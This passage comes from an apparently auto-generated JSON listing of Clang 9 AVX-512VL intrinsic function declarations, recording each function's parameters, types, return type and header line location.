"/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2225:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_cvttpd_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2232:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2240:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2247:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2261:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2268:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2276:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2283:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2291:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2299:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_cvttps_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2306:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2314:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2320:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2327:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2334:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2339:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu32_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2346:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2353:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2358:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2372:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2377:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_cvtepu32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2384:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2391:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2398:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2405:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_div_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2412:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2426:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2433:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_div_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2440:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_expand_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2447:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_expand_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2454:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_expand_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2462:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_expand_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2469:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_expand_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2477:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expand_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2484:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_expand_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expand_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2499:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_expandloadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2507:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_expandloadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2515:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_expandloadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2524:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_expandloadu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_expandloadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2541:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expandloadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2549:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_expandloadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2558:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expandloadu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2567:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_expandloadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2576:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_expandloadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2583:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_expandloadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2592:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_expandloadu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2599:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_expandloadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2608:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expandloadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2616:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_expandloadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2624:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expandloadu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2633:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_expand_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2642:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_expand_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2649:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_expand_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2657:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_expand_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2664:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_expand_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2672:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expand_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2679:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_expand_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2687:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expand_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2694:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2702:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2710:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2717:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2725:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2733:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_getexp_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2740:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2748:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2756:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } 